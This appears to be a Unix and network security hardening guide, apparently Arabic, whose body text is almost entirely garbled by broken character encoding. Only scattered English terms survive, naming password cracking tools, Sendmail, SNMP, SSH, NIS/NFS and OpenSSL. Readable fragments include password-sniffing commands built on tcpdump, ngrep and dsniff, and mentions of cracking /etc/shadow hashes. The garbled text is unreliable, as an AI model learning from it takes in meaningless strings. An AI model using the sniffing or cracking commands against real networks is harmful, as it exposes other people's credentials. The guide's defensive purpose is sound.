! <) " S ) ( #. P !& 7 B 5! 
$ & @ P 785/ ( 6 6& ( E 0 5 crack 2 P !& $ T#< A" @ ) S ,G PF 62 ) T 5! " U 4 P! 6& . 2 & 2 0 % 5! " U 4 P ! 6& Npasswd " , 6 U : -, < d * 6 * 6 0, 5 - Y . 7 ]Cracklib " , * ?), ? , - <\ X ) 6 P ! $ I5 I # 0, 5 F) Enabled , crak ?@ 6& 1/ Cracking C, E P! ("c , < 5 $? " ,< P '7 B 5! ? ("c 6" E 0 ( E -, < 6& ("c v 4 & _ E 2 " 6& O * - . W L3 +H ) F u 5 John the Ripper , (4lc4)10 phtcrack version K6 P! 7 6& ? G ) stand-alone - Y cracking " - Y $= GX b & PAM-Enabled P ! 2 ) u P !& #P< ) L $ P !& % 7 K " U4 ? " , " DY/ 2 < Q0 6 N " U4 0 5 b 6% 5G1 I K6 & " - Y ?# ? , " ("c " E S S 6 - Y -,< ? ) Npasswd 5 l' 6 ) ("c F N656 I 5 ("c , PAM- S 1) U# Q 0, 5 - Y _ Crack $ E 0 6%5G1 ) A & l ' GX) )C3 0 "] K ? @ I $? ,K & S I5 N K <) 0 hashes 0 P! 6& # 0 #. - Y etc/shadow/ " F) hashes I 5 A8 ) hashes " - Y W L3 \ 2 # - 5 (N P ! 6& ("c " 0 3 P : (E 2 LDAP ) NIS 6" E $, -, 2 &N F 25 6 & ) 25 9 6" E - 3•/etc/passwd ) NIS ?, 6 ) $, -, # H 6$, < 0 , 6 3 ? @ cracking 6* 5 • DY/ $, Z F LDAP DY/ ? # 6& -,< " ) < 25 F) 25 2&N F 25 <, 6 & g 9 6 - Y % 4 : - Y MDS N1" 2 0 - Y 6& ? 5 hash P ! 5 7 L N I 5 Crypt 5 ,H N1" 0 b ? @ 0 DY/ (, ! 7 ' ,63 ? $, < , 5 ,H ) #. H, , e G A" @ I 2 < (, ! $ N DY/ ) ,< P! & < 4 P! & " %P H)S 6& ? P ! 6& : 2 0 1E E 6 N4 W 3 K6 2 ) ) ) X 62 ) " 0 V ? " , ?@ % has expired O* 3 K6( 4 2 ` • P $ 5 - Y ?@ " , account 60 P ) 5#. ) , ,F P! & u 7 ) X ) _ ' L 7 L -,< , 1 ] 1 ) B 1 $ 6 ) ' H , P4 : 2 )? ) ("c) ( E ^P P ! N 1 -,< , K 3 - 56) " P ! & log in 2 1 ) , & / ? 59 ?@ ? # 54 "2 I K6 K6account MR/ ) 1 P! 0 B' 4) K T ) T G' g 6account &5 0 < +H ) , Y ) P! & A" @ ? 6A" @ ? U) : 6& <- $, 5 , ,F 6account , # 4 0,< ? b %L K ("c - Y ?@ " DY/ B . SB g 0 ("c 2 ) " ?# 7 0 6& P ! , account 60 account P ) $? , Y 5! ( 5 -, 6, ' 0 MR / P ! ?@ ?, 3 ?# ? / P $S K (,! 0,<P F $ 6& 6 B 5F " , -,< - 3•?@ P !& U) % < F) ? N Your password 3 F B 5G1 , <P = GX ? " ("c ' P ! 6& ) P -,< 6account ? 
)&' I 5 - 4 $,< (N " 5 ?@" - Y 3 nB G account MR / 0 "% I ' 3 - Y $, - 5 Clear Text Servies 7 L $ U# $ P N& =GX 0, 5 ?# P !& 6 -,< - Y 5 - Y ?5F 3 6- I? telent ) FTP bP 7 !89 d * 2 2 F ?# $S ? 5F b N )( d * 0 , <, 6 3 Clear 7 2 _ L 7 !89 text plain " )- , b !89 SL <] -,< U# < ?# b ' ,B )- 6 " R4 S @ )@ +5F a,6 3 6N 6- #P < 6U ) ? , ) ))7 L $ -, 6 U ) -,< - . _login 7 !89 ] $ F <d * 0, 5 !89 I 5 8Q 0 )@ , 6 3 , 6 3 plain- text 7 !89 " ,G ) -,< E ^ P 7 6v 4 ) ? , 6' ,5! ) - Y $ sniffer -, < K 2, SB g 0 N& h / 7 !89 ) #P < 6U ) " ) 6 ' _ #P< ' -,6 ] bP B . #P < 6U ) " _ ) N6 ] 3 785/ ) 6 P! & 3 1 " T),F $, 5 1P $ Text U) Clear 7 4 Clear Auth 1 @ Content FTP 21,20 Yes Yes $2 TFTP 69 Yes N/A $2 telnet 23 Yes Yes 2 SMTP 25 Yes N/A $2 Pop3 110 Yes Yes $2 rlogin 513 Yes Yes 2 HTTP 80 Yes Yes $2 ? 6, K , 6 3 TP, ? ^ 2 c h / F$2 6- FTP ) Telnet I K6U ) T L 7 !89 $ , < " ,E - Y 2 7 , 6U ) < TP, b $ P !& clear text 7 , 0, 5 Z F $ , K F$ ) - " 2 ‚ / T3 - Y ? 5F Clear text I ?5F -)8! , 5 ? @" - Y 0,< 7 !89 % < &1?), % a I YB* 7 , , 7 !89 d * )$ < $ ,L -, < K 6* 5 Free/OpenBSD j 0, 5 SL 6U ) ) 2 3@ ^ l ' 6U ) "2 $: " 3 +, 6 ZQ 6U ) ] l ' R4 S @ : d * ? 5F b _sniffer] -, < - Y 6& 5 5 ]U 1) U# $ e 'j 4 7 L $ _,< + clear 7 5 ) FTP )telnet ] T) , 2 I ", ) " $-, < K U# 5 0_, <P )( 3 - *1 7 $785/ ( E - Y text Clear < L 7 $() * 0, 5 0 I 5 A) 2 &'( ! ". /0(123& 2t5: ) 2 [ # $ _text ? 5 T G'- . 0 5 - Y tcpdump $ "2 " 7 L clear text ^ P a F 2 1 ), 0 6d * I 5 $l ' #tcpdump-X-s1600 5 - Y & ngrep a assword 6 ' #P< -, ' - .0 I I N ) sername 6 I W 3 K N1 $ 15 / • & M) / 5 - Y " ? " 2 E F ?# $ l ' I 5 $ M) / 21 )] , 5 http://www.packetfactoty.net/projects/ngrep/ 0_ "7 L l' ? 5 TG' #ngrep assword h / 0 6- d * "2 I5 & 2 1 ), 6% # ) 4 ) N \ h @" ? l ' ? 5 TG'- . 0 5 - Y : 2 $ Dsniff 0 5 - Y _ P !& )( ]? P! & ) ( z)" ? @ $ d . " U4 ) ( E 6& " ? 5 W L3 ("c POP3 ) Telnet )FTP ? )@ $l' I $ E/ Plain text , 0 , 63j 5 http://www.monkey.org/~dugsong/dsniff/ a "7 L $l' #/usr/sbin/dsniff ! 
" %& level•Link , ,< N& %H ,/ ) End- To- End N, # T G •$ 7 # ) connection 6 N& BH m .1" 6%# ) 4 3 N& " - Y +H ) , Y ? $,< 5 _tunneling] h SSH % H] ) Z F U# )(replaces 6* R 4 M :G ) T) , Q l' -, < " - 4 5 I] N& ( E SSl OpenSSh _ http://www.openssh.org/ h @ telnet,rloging,rsh) ) - " 7 9P 0 "2 _ HTTPS , POP3S K6% # ) 4 ) $ SSH:Secure Shell n 9 " 0 456 123& - Y X11 )(pop3,SMTP I ?@ " ? I K6%# ) 4]tunneling ) 0, 6 2< ? ) connection ) ?@ , POP3 ? 5 tunnel - . Z F & SSH 0 " P POP3 -, 6 U ) a K5 F -, U) #ssh-L110:pop3.mail.server.com:[email protected] - < localhost 7 4$ 6 7 4POP3.MAIL.server.com 7 7 L # ) #1 # ) #1 4 -, 6 U ) 4 -, U) $ ] TCP110 T 5G T) M83 ) 2 < 2 7 9P 5 S 110 2, _ 0 (tunneled over SSH) 0,< ,6 3 ( E -,< & stunnel " - Y tunneling P ) _ openSSL Toolkit " - Y 0 ] " , * plain text 7) Y ' N& T) , - 4 6% / - " N # SSL %# ) 4 $ l 'A) 0 6%# ) 4 ? 5 tunnel 0 5 - Y http://www.stunnel.org h @ " ? I5 ?@ ? l' ' Senmail 6 ? 5 ) ') ' $ T # Sendmail 0 " ? G ?@ " - Y $ 785/ ? (,! : # ) #1 )- )? ? - Y U - 1) 4? ,6U) - 5 ? 5F 5 ,H % 1 , -,< ( E 785/ Q : 2 - 6 SB g # #1 Mail Transfer Agent 2 1 ), - 3 ?1 $ Sendmail I 5 ?@ " - 56 ' # ) #1 6 1 ) M ,6" - -,6 $-,< SL a 5 - < ?@ +" U „@ # Sendmail 0 ^P 6* ,G S 3 785/ " patch 5 2, CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL -CERT ADVISORY CA-2003-07-REMOTE BUFFER - CERT ADVISORY CA-2003-25 BUFFER OVERFLOW IN SENDMIL a 5 -,5! -) ) ? SENDMAIL bP 7 , , ) 7 :3 , , 6 3 BUFFER OVERFLOW ?@ #4) % , PC 8Q], < T) \ 7 , , ") < TP B ! 7" PATCHING (, ! ) e 'j 4 , #4 " Y 7 GP , B % ! 0_ # ) #1 6 S 2' +" ) 5 ,H - 1 @ & 6* 6% '" - Y " - Y () \ 7 , , C,5! B B ! 0 $() * send mail " -, < S L * 0,< - 5 U# )U +, 1 6* TG'e 'j 4 7 L $l 'U ) + * K )f , 5 ,H * - ) ' ' j6 ?@ ? 5 d* I 0, 5 - Y R4 S @ ^ X ! Send mail <R HS @e G " 0 ! ". /0(123& 6patch ) R 4 S @ ?& $ 9 < ,6 3 5 CP l ' &'( sendmail " , , ,F -, patch * - 5< Echo\$z\usr /lib/sendmail- bt-d0 7Y , $ , #4 F sendmail -, < " ? 
sendmail -,< d * l' K * 2 3@ " 6 @ , < http://www.sendmail.org/current-releaese.html h @ ! " %& 4 sendmail DY/ ) " a $ F 6patch 2 3@ " ) Z * http://www.sendmail.org h @ " ? ] % ! ? , X ! 9 25 2 3@ source code patch I F - 5 sendmail * -, < K % ! 456 123& • * ' 0 # ' " %/ - Y 5 - Y ? $_package 0 5 GF U 1 6 ?@ Q 1G') - P I e 'j 4 7 • L C 5! sendmail mail -, 6 U ) ? ! # @ /] U# ) daemon ) 6 _ ,6 * mail SL ? # _ –bd ˆK ? 5 T G' g]0, K5 T #4 : sendmail sendmail 1/ 2 < ,6 3 etc/mail/sendmail.cf h @ F l ' 62 < F) ? `56l ' 6 # 4 % ' mail reliy , b <( E c 5G ) C ^P # ) #1 P 5 , 0 - < sendmail.cf $ , < ( #4% ' 0 . " " Z F deamon 1/ $ !89 + " ? : 2 sendmail 0 % H • ("c # / ? 596, < ( E , #4 a 5 - Y http://www/sendmail.org/tips/relaying.html http://www/sendmail.org/m4/anti_spam.html T G' g e 3j 4 , 'j 4 7 #4 L open relay ? # sendmail 8.9.0 * ?@ C, E $ % ! 6 ? , - 5 -, < K sendmail * $% ! -, 6 U ) - Y (, !] ( E X !" " - Y 7 W " ,G0,< 0, 5 L3 2 ("c TG' H _realying]0 ("c$_ N -, ? 5 ˆ K ] sendmail , ,F * * , $ 5 ,H * b -, < K $ sendmail , h @" ? , #4 #4 " - Y ? " 6% ' u W L3 ^P 7 K &F " ("c 6@ • , 0 0 5 - Y http://www/sendmail.org/m4/readme.html download ) - Y pgp signature " 9 " " g@ 6* integrity <R Q # * ?), ca-2002-28 h @ " ? ? " E " ? 59 < H 0 <- Y 3O * " sendmail F + ?@ " /S ? " : 2 • # I # 2 $ ("c : 5 sendmail 0 5 source code sendmail B5# 7 !89 2 ' 6trojan I5 0 , 5 , - 5 sigm I 6, B0 5 - Y CERT advisory -, < - Y http://www.sendmail.org/ftp/pgpkevs/ h @ " ? I 5 MD5Checksum " a 5 - Y sendmail ' PGP ?, '7 )@ , 0 - Y sendmail +P , INTEEGRITV " !89 + " ? 
7 !89 S http://www.sendmail.org/secure-install.html http://www.sendmail.org/m4/security_notes.html gshapiro/secu rity.pdf http://www.sendmail.org /~ Simple network management protocol (SNMP) 6- N 5 SNMP" - Y , # 4) ) - " y # I 5 ?@ " 0 < SB g - Y $T - 1 )$ 6Access Point$ 6ˆ K $ 6 ) $ N4 " $SNMP0 < #P < - Y $ #P <y ) SNMP 6N , 6N TCP/IP G - Y SNMP %# ) 4 " I #P< 7) Y P ' 4 6( '784 2 I K 6N , ) , 6N 6- " 2 ( 4 1P I5 ' ) )Y 0, 5 " PG ), K (& # ) -,< 1P ,G * ]SNMP , -, < - Y 6N I 5 -,< - Y B % 6A) 6A) ! B 5F " $ 6 ( 4 bP R4 S @ ^ b 6( 4 3 -, < K (E H$l ' R 4 S @ ^ , ) , I 5 -, < - Y " - Y # 4 _U ) 6 A) " [ ? 5F 0 ? ' 9 SNMP A) " [ , G 7c L. ) - P ),. SNMP" W 3 ,1 b ), K : 6A) - Y R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ? R4 S @ ^ 0 3 3 SNMP R4 S @ ^ 0, < 7 K &F - 5 _ 6( 4 #4 % <& * $l ' ? , " ] DOS \ " 7) Y 785/ SNMP P 7 & E ) 7c@ 2< -, < - Y o SNMP 5 , H ] & ? G -,< & $ SNMP 5 , H 6A) " [ N& S 6* g’ V 6( P e % ! N "$ -, Y SNMP 5 i: j &' I 5 ? , , 1 " < $h / 6- ^ $ SNMP ' ) !89 < TP, I5 _?@ -, < % L 3 M, 6nH ) S * e 'j 4 7 T, " - Y -, < K P 6A) W L3 #P< 7 & E " % /f %1 , : $"), ) F 2 - Y ) ("c , G ) G I 5P ^ u“ L 3 “7 L 3 ) 7 !89 Z ' 25F 0,< ,G ) TG' SNMP 5 SNMP - 5< * $SNMP #4? ) ,< - 5< * d * SNMP0_, * 5 U# 785/ Q $SNMP -, < d * U# ?@ - 5 ) SL SNMP * U T G'e 'j 4 7 SNMP , # 4 6 1) U# % ! 6 L $l '% # ) 4 SNMP l ' R4 S @ : $ P 785/ &1 @ ,, e G )- 6 - Y $ Bridges ) 6point access$ 6 N4 0 0 Q 0, < ^P 3 785/ & c L. $ N ]0, < “V X ! ] #P< Q 0, < K 6T, " - Y ,K " ,G b H$l '7 !89 " - Y , 1 , 5 B!, j & ' ) 6 F j , 4 R4 S @ ^ <0_, 5 O* 6( 4 , K " 5 i: L ? , H 6N 3 ] 6N 6 * 0_78# - Y R4S @^ PG PG ) , K I 5 " $SNMP) ) <’ 'j 4 A N0, < 6( 4 " 4 " 6A) " - Y (,!0, 5 <“ , 6* P 5 SB g 0, #P <% ! 6 0 < ,6 3 =GX 6 ) X ! ) 6N H,, e G R4 S @ d * ? 2 $ #P< -,< %L ) F 5 $ SNScan N 4 6N 0 5 - Y ) SNMPSL A) P ) #5 - . I5 " h @n 0 9" 5 ("c 7, - ? $ ? , 2 E F$? F) N 4 0 I 5 ("c 7 B 5!$SNMP " 1 ("c " http://www.foundstone.com/knowledge/free_tools.html ' W L3 @? 
6 & " - Y ?# (E : 2 SNMPZ&F ) SL 7 L - 4- ." 0 6 @ " U4 GF 9 SNMP? (E # % ! T G'd * 2' 5 ' 2 F)0 (E w•w)w•p 67 4 ) ("c 7 K&F " 6 @ I5 0 b <" 6" F T/ “SNMP“ R4S B1$ SNMP @ 0 5 - Y CERT-2002 03h @" ? # n. 7 a < ,6 3 ? G -, < - Y ] 13 W L3 $SNMPSL ) " H,, )S @e G F)• 'j 4SNMP Community )e _ P ! ") F)• community SNMP Y* F)• 6 < DY/ - . $ l ' R4 S @ : % DY/ I 5 0 5 a-, ,, )? P@ ?@ " - Y 7 ) X (,! 7 N& ) 6( 4 , K I 5 $ SNMPv3 6 3 6, " % DY/ SNMP ? 5 TG' g• P T, " - Y • _? # 7 -, < K patch * j* ? $? , 2 3@ $) , 1 7 L* 6& h,/ % H SNMP coomunity R4 S @ : % D Y/ 7 , H ? 4 * " 6 @ ] 6- SNMP " - Y 7 S L $-, • ,1 b 0 5 GF $ CERT Advisory CA-2002-03 5 5X )TCP/UDP , ^ w•w7 4], K5 SNMP agent K6 9 ),. !89 SNMP 3 b 3 , ? & w•p7 4 6N "• T 2#5 l ' J)0 ("c T $U# B'T) ' " - Y 0 , ^ P A R 4 W L3 ? 5 V8 SNMP• B F) F 3 7 L lYB 5! ? y 6 6- SNMP agentb 6 6 3 $ ) 6 ) TCP-Wrapper P (E 6 % ! agentb ) ) l '7 B 5!0_TCP/UDP ) X # 0 - Y B' #P < ? 6 1 )$,< Q 0 (E ( E xined , & ?& #4 agent ) 0 < +H ) [ h,/ % H DY/ SNMP? 5 TG' g• ?@ " - Y 7 ) X (,! 7 I 5 $SNMPv3 N& ) 6( 4 , K 6 < % P " - Y • T, _? # 7 I5 W 3 " $) ("c 2 0 - Y _ - ),. ) ) 7 L )- ) ( #. 6& ? G -, < - Y ] community P! h,/ % H g & ) 0 @ 3" ? , O* u& ("c : 2 0 (E N "W 3 6 F 7 # " - Y • P ! 6& -, < ' - Y $http://www.sans.org/resources/idfaq/sanmp.phph @ ) TCP/UDP , C ' W L3 • SNMP " - Y 7 * 0, < I ] 6- ^ w•w7 4], K5 B' , ) ) 6- l '7 B 5!0_TCP/UDP ) X # y B' #P < # 40 (E 0, 6 ( E $-,< &5 $ , -,< K SNMP• B ^ w•p7 F) F 3 7 L 6subnet 2 SNMP " E ' 4 6N I5 SSH (Secure shell) % 'T F$Login " )7 l ' * ] OpenSSH &'( 25 " U# P - Y $SSH Communication Security R- ) telnet$ Ftp 6 ,G P 6=GX$ -,< - < * &K/$ ? @ " , ,G ) - ,, 2 5 0 b _ U) $l ' R 4 S @ : _U : F 6=GX Q 0 F) )- 56 ?# $SSH " - Y N5 6=GX ,< F -,< K 7 !89 Q $"), ) ] nix*) "), ) 1 $U# 0, 5 Command P B '8 i: ] #P < SSH # ? `56 1 )$,< K &F 7c #< C ' )? , (, !$ 6 Q0 )_open-source 7 L 5 ( ,H ? @ ? 5 M 9 R 4 S @ 2< ? ,6U) ) 6 E * P $SSH 5! U ) bP 0 ?5F SSH 6b. 
SSH-, < " - 4 6* SSHS %K , ( N ) 6Patch $("c " # ) , #4 0,< , ^P < TP, C L3 3 W 3 78# ) SSH2 K 6% # ) 4 & ) HTTP$U ) $telnet -, < - -, 6 U ) …-, ^ P C $_ SSH2 SFTP U) L3 A" R4S 4 Kc F) ?@ ? # 2 # " @% W SSH2) SSH1 ], < ? # -, 6 U ) ) -, 4 (,! 3d * 6 * R4 S @ , 5 6 &'( F " , G $OpenSSHb & < - < # 2 6& ) clear text 7 L -, L3 2 U) P I $ SSH1 % # ) 40 H session & SSH2 # ) 0_ OpenSSH " 2&N F , 5 ,H]POP3 ? , % 1 2 , 0, < ], N, # @^ 6A) a I ]rhost 6sessionS % # ) 4 " - Y $ #P< ) : R 4S ;! _rlogin) rcp rsh$, K 7 !89 T )- P d * ("c0_ SSH * ("c F) & Z Q OpenSSH ? -,< E 6% 4% CERT 2002-23h @ " ? $ 9 l ' * ] OpenSSH " - 1 @ * I 5 0, 7 K &F " 6 @ pqqp T 0 5 - Y Advisory ) ' 6S @ ;! ) A % 3 6 ? " R 4 S @ (, ! " ? 59 ) : I 5 0, < trojan-horse _ 2 7 !89 S - Y http://www.openssh.org/txt/trojan.advh @ " ? $l '- 1 @ * 0 5 ,, e G -,< K * ]?@ " ,G OpenSSH 3.3 ?@ ) U ) SSH Communication Securitys SSH 3.0.0 % ! 6 1 U# * 6 )_version 3.6.1$pqqp T Z F ) S L _version 3.5.2- 5 < pqqs T -, < K 0 < ,6 3 * ] ?@ " , G HS @2 e G $ R4 S @ d * * R4 S @ W L3 -,< SL U) * ("c - 5< " $“ ssh-v“ ) - " d * 6* $S N 4 ? : 2 & $ ScanSSH0, Patching (,! % 1 , 0,< - 5< ^ P ScanSSH * " - Y 0 #P < 6h @ 2 3@0, 5 K 4 6Z 0 5 SL ?@ http://www.monkey.org/~provos/scanssh/h @ " ? ' a Patch2 3@ ) R4 S @SSH? , 6 ! " %& 0, (E - @ < &) j 4 ? , 6 U ) -, < K pqqw T 0 5 F I5 , Y 1 $ ScanSSH :3 " ? - . F " * $l ' R4 S @ : % 2 3@ ?@ ) 0, < 2t5: ?@ * ' DY/ I 5 )SSH * - 5 OpenSSH )SSH # $,< -,< SL $% ! ) openSSH 456 123& % ! -, 6 K " 9 2 3@ SL " $OpenSSH" - Y 7 • SSH1 G : 0, 0,< ? , - * P , TL ) I - * 6 & " 6 -, 6 U ) S! 5 $" E ? ! j &' 0 6A) $?@ I5 ? @ " ? , # 4• U) S 2 0, 5 U) N 4 )• W L* ,K , #4 SSH? , 2#5 -, " I 5 0,6 d * ,Y : 5 5/ rsh 2 NO , $SSH , # 4 % ' FallBackToRsh, B P -)8! S ,6 3 - 4 * )? @" - Y 6 ) ? - Y O B : 2#5 $DES3A) ] L F TL ? " 2` 7 3 5L -, @ ), . ? # 0, 6 ( E 0 0 F) $SSH-,< " 6 2< " - Y ) ) <, ! 5E F 6 & " SSH SSH2 G I # 4, G ), 51 /• SSH2 SSH1 * $ Z - Y DES3% 2, 0_,< -,< ' 3 P ( #. 
N& " • blowfish I 9 * " & -,< ( E e 'j 4 N& $ 7 B 5! + ,I ! + ; Q NIS/NFS ) $(Nis)Network information Service)(nfs)Network File System U) Sun ) $ NFS0, < <b #P< F ) V < ? # l 'U ) 6 '• & 6 6 2 " - Y 7) Y 6 % ' I , 6% ' Q ) u T 5! ? # $NIS & 5 maps] 7 u T5! 7 ) X (,!]0, 5 ?# ^ 6% 'V 0 -, ) L*< 6 $ nis0 7 U# 6 #P < I 5 Microsystems < " - ) 4 ) / 9$U# F 2 % 'V < , 6% ' A) $ NFS0 , -,< +" , 0, 5 -,< - Y !89 U) 6 'hosts)passwd 6 '_ !89 ] : 7 !89 K $NISM,62 5 0_ #P < " F 6 I 6 5 group)passwd ? ,K & 5 =GX C 8Q] NFS I #P< 6U ) B'0 I5 ? @ " ,G ? @" , ?5F 3 ?1 ,, e G 6 " H NISb I K6 &'( " - Y I 5 NIS " (& # 0 ? 5F ,K ) 6, " 0,< dos$buffer S ', 6? G F 6- Y/ " - Y Z -, < - Y - Y patching)NIS)NFS 6U ) $S F 6 0 _? F 3 785/ , 63 ) - !89 )- B . 7 3W 3 F - ?5F S 6=GX ) ? H ypcat j 5 P! & $() * - 5 U 0, < 1) U# NFS )NIS " +, 6 5 CP TG'e 'j 4 7 L $ l ' 6U ) + 6U ) : ,F ) ) - 0, < K NIS)NFS " * -, "2 (E R4 S @ 0, - 5 - Y 6U ) )- \ " -, < ( E 785/ Q 0, -, # 4 (, ! 7 % ' $NFS)NIC 56? 5F $ l ' 6U ) , K 6maps] _ I 6=GX , G 785/$ ? @ " - Y overflows - _ < 0, ! ". /0(123& R4 S @ d * I5 a K6 * 5 0-, ), , e G ,1 b ,< -, -,< K SL ? @ ) F patch 2 3@ " - Y NIS * I 5 0 ' 6 @ -,< SL NFS * j 5 & NFS * 6@ - 5< l ' • patch 2 3@ SL " ? 59 ) rpc.mountd-version - 5 <" 4 6* Q ) -, (N 0 < ,6 3 HS @ - 5< " ? ] 5 - Y ypserv-version " ? 0_ ,6 3 (N R4 S @ ^ 0 R4 7 N 4 " ? $ &'( , ,F 6=GX W L3 , "c a 4 NIS map ? 2 0 F P! a 4 NFS S 6" E ) netgroups$? % ' & ? 7 L -,< 3 I5 , N (,! " ? 59 • 6& " • I 5 cracker " -,< = G 6& ( #. " 5 , # 4 (,! password root 6 0 5 - Y $-,< = G - Y NISS " I5 • R4 S @ d * P ! , # 4 (,! ( N W L3 3 I5 ("c • etc\exports\. ) -, < export " ! -,6 I 5 showmount e F• 0 ?@ 6 R4 S @ : % 4$NIS , # 4 a " ("c N 4]? , U) NIS? , 6 U ) ) 0_NIS -, 6 U ) -, 6 U ) 67 S 2, 0 4 n 9 " ) -, - Y makedbm ^P " ? 5 d* • i ? G 6 TG'Yp-secure U) DY/ - . 6I W L3 J)$ DBM 6% ' E ? " b 1 - 5 S ˆK " ? 6 : 2 3 0 • C ' ,6 3 v 4$" E 0 5 -" /var/yp/securenets 4b 6 #P< ) U) a % ) ? 
+:*:0:0:::z • password map 4 NFS , # 4 ^P - -" F etc/exports % ' ? , U) " 6h @ " - Y • qualified domain names]fully_FQDN ) IP ,! 0_ < & z • - Y ypxfrd) ypserv 6 0 NFS ? , 5! # "] G - Y $ NFSBug ( 0, 5 " ? K , , #4 I5 ! I5 • #4 7 # l ' 0 5 $NFSBug " ? ' 0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @ % ' : I 5 etc\exports % '" - Y • ),. T5! a " 25 ? )&' NFS % ' 4 U) mounting " 15G ? domain ( ^ 4 ? )&' NFS 6 G5 … ) IP h @ " U 4 home10.20.1.25(secure)a8Q0NFS -, ? )&' ? ^ l '7 B 5!0 S IP " U4_2< ) ?, 3 0 NFS % ' 6" E rw ) ? 5 export … ro]("c , 3 b' ( E etc\export % ' NFS -, U) 6" E domain ( ./ro)10.20.1.25 homeC 8Q ^ Domain ( ) IPh @ " , G root_squash superuser $, < -,< TG'l ' NFS -, 6 U ) ) 4 # H$ -, U) - Y NFS? , 0 ID nobody 4 "$ ?# 7 NFS -, U) user root S ) 0 … U) ID root ) 2, 0 2&N F , 6 * root ) 6% ' u root_squash/.)10.20.1.25 homeaC 8Q ? l '7 B 5!0 0 TG'7 4 y 4 % ! 4 NIS ) NFS 5 ?,< V8 " ? 59 ^P I 5 T) ' 6 • n 9" C ” ' " ) (_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C 8Q] U) ) ( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&' a 67 $U c $ NIS)NFS ? , 6 U ) N" • ) X ?# 0 <( E " E ? , g 0SSH• I 25 % # ) 4 2 NFS" - Y W L3 ) • ("c 0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ? NIS ? , 6 U ) , # 4 ) SL Z )? , ^ ,1 b -,< K 6 @ 0 F 7 !89 " checklist UNIX h @ " ? $=! > 5 SL • 6patch * %K : $ NIS) 2 3@ ? 5 m .1 U# 0 5 - Y security d * K6 W L* deamons ) ("c N 4 0 5 MR/ , K ) / 9 NIS )NFS -, 6 U ) I 5 0, -, ) " NIS ) NFS? 5 TG' g• ^ 6 )]NFS ) NIS _?@ ) 6U ) ? Layer open secure sockets (SSl) ? )&' H I5 f ^ P N, # l 'f #4 " -, (E N ,G #P< n 9 " - Y 6 open source 7 L ]openSSl &'( $_ 2 K6 -, < 1P 7 !89 j &' ? ^P , 5 4@ -, 6 U ) SB g ? 5F 0, 5 " openldap,cups,maila I OpenSSl0 < , 6 3 a 5 - <? @ H$ l ' R 4 S @ ^ N H F 5 " - Y 0, < 2 ,G e G 5 openSSl - Y openSSL ,G $( * # 0, - Y - ?5F 0( openSSL 5 & , 5 ? 
$ openSSL M, 6" 0, 6 - Y openSSL 6 25F 6 #P < I 3 785/ $ : u 3 3 K O* " H a, 5 5/ I 5 ],< openssl " - Y $ 7 I N& H M, 6% - Y openSSl " 4@ -, 6 U ) ^ P $hhtps " 0, - " connectionn N& 3 <) 2 5 $ 0_‹‹s 7 4 ) * R4 S @ ^ $() $T) ? G - *1 , ,, e G % ! 6 F ) openSSL 0.9.7 * ?@ ) U 0 < ,6 3 1 ) U# HS @2 e G 6 " $ 6 F ?@ " %P H R4 S @ d * ,, e G $,< -,< SL ?@ " % H I 5 $ openSSl version " ? ) versipon 0.9.7a * : 2 0 5 - Y $-,< SL # 0 < ,6 3 &'( * H S @) - 5< " R4 SP @ : % a 4 " - 5 OpenSSL # 9 * 2 3@ 9 % ! %L 0 I5 "2 F 6 & openSSl -, 6 U ) ) • ?@ ) ' • ) ipfilter" $? # 7 K6 <- Y Z , 1 " $,< -,< SL % ! 0 5 SL T 5! DY/ I 5 2 , ,F ) 2 3@ -, 6@ DY/ - . $l ' R4 S @ : % $ openSSL * - . : ), . $, Q2 gN8 3( 2& & Socket Programming K &F ? G ) ( E % ! Unix % Q 6% ! ? , u 0 < F) M :G 2 @ TCP/IP – B #) 4 " 6‰ 9 b bP S L ) K ?@ - 56% ! h ?@ IP)TCP B #) 4 SB F Linux % ! - 4C c 5G 2 ?, Windows % 6 " 6N "@ H8! I R1 6b . %B .) 0 N C %Q @ , 6, b. u ,6 * U ) - ?) -, < = D U / 9 < b. # = G c • A 3 ) ) W 3 # ) #1 C5 6 2 ‰9 6Y . , U BT 6 K6, $n5! , GCC F 2< ? " c . K %L'2 , • ( Y ) #P< TCP/IP% # ) 4 i . e ' , 5 % <@ #P < . H 7 -J) 7 # G( 0,< e 'T/ % ' , 2< A) - 0, 5 %L'2 0 b. 4 b. 1Q ) 6 K 2 `56) ) Linux % ! 5 63 6C? " , , < 0, -,< 5F ,63 PE . ( Y2 . ( 6 ^P '#< ,P 1 " g@ : %L'2 0, #P < . Y( H ?@ ( Y , (5 I %L'2 c ,< 6 P" U# (5 % ! ) ,< \, 6 ) 4 2 - / y ?/ 9 b ? F T P) #P < 0 % ' 7 b B'" ) N4 , & (I/O) 6 F) 3 ) , 5 6Y ", - 6U# 5 <, < $, 3 @ T, • , < -, < ) )\ , )% % ' b. B 5F 2 5< , < ! ( 5 •0 < T, ) 7 @ L N4 # B % ! N N) (E " , T /2 ! )- 7 B 5! 3 , $2 k a, 6, (Read Only) < b' B'7 L ?@ , ( _ fopen() - <? ! % ' L* % ' , 56 N4 open() 7 % ! &@ _=1 ] 0, ' %P H B / " E _O 0, 2< 15G 7 0, ?56 , <T N4 $_ fwrite %PH B / " -,< " % '?) _ fclose() ? ! ˆ6 0 ) ) ("c 2 -, ! 2< close() 7 U 0 ,< ,6 * B / , j 5 .Y % '( , H 4" ] 0, , P % ' ( 5 " U4_ 256 < ( E , B 15! ) N4 * ? G N4 ", - # H- Y 0 , 5 T, % '? ! # ), , F) 3 ) =B* a, R " 6N B / ?@ " ?, 3 j 5 .Y 6N # U B 5! ( 5 ,6 3 M Y< ) - )? 
